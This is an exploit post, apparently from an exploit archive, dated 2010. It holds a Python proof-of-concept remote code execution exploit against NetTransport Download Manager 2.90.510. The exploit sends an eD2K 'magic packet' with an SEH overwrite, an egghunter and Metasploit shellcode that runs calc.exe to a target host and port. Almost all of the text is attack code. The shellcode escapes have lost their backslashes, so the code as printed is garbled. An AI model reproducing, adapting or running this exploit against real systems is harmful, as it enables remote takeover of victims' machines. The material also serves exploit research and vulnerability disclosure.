NetTransport Download Manager version:2.90.510 0day :

Date : 2010-01-02 Author : Lincoln
#!/usr/bin/python

#########################
#NetTransport Download Manager version:2.90.510 0day
#Discovered by Lincoln
#Tested on Windows XP SP3
#
#eMule file sharing protocol
#SEH overwrite, leaves only 60 or so bytes after p/p/r
#egghunter is used to find sc (calc.exe)
#
#root@BT4VM:~# ./netxfer.py 192.168.1.8 31491
#########################

import socket,sys

host = sys.argv[1]
port = int(sys.argv[2]) #eD2K port

# * windows/exec - 200 bytes
# * http://www.metasploit.com
# * EXITFUNC=thread, CMD=calc.exe
sc = ("xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2"
"xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85"
"xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3"
"x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d"
"x01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58"
"x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8b"
"x04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xff"
"xe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00"
"x00x00x50x68x31x8bx6fx87xffxd5xbbxe0x1dx2ax0a"
"x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75"
"x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63"
"x2ex65x78x65x00")

#magic packet
buf = ("xe3x3dx00x00x00x01xeex4fx08xe3x00x0exaex41xb0x24"
"x89x38x1cxc7x6fx6ex00x00x00x00xafx8dx04x00x00x00"
"x02x01x00x01x04x00x74x65x73x74x03x01x00x11x3cx00")

#egg =  c00lc00l
egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x63x30x30x6cx8BxFAxAFx75xEAxAFx75xE7xFFxE7")

#p/p/r 10002a57 libssl.dll
buf+= "x41" * 119 + "xebx06x90x90" + "x57x2ax00x10" + "x90" * 10 + egghunter
buf+= "x90" * 50 + "c00lc00l" + "x90" * 20 + sc + "x90" * 2000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buf)
print "
Exploit Sent!! Give the egghunter a few seconds to find the shellcode
"
s.close()

C1

 

C2

 

C3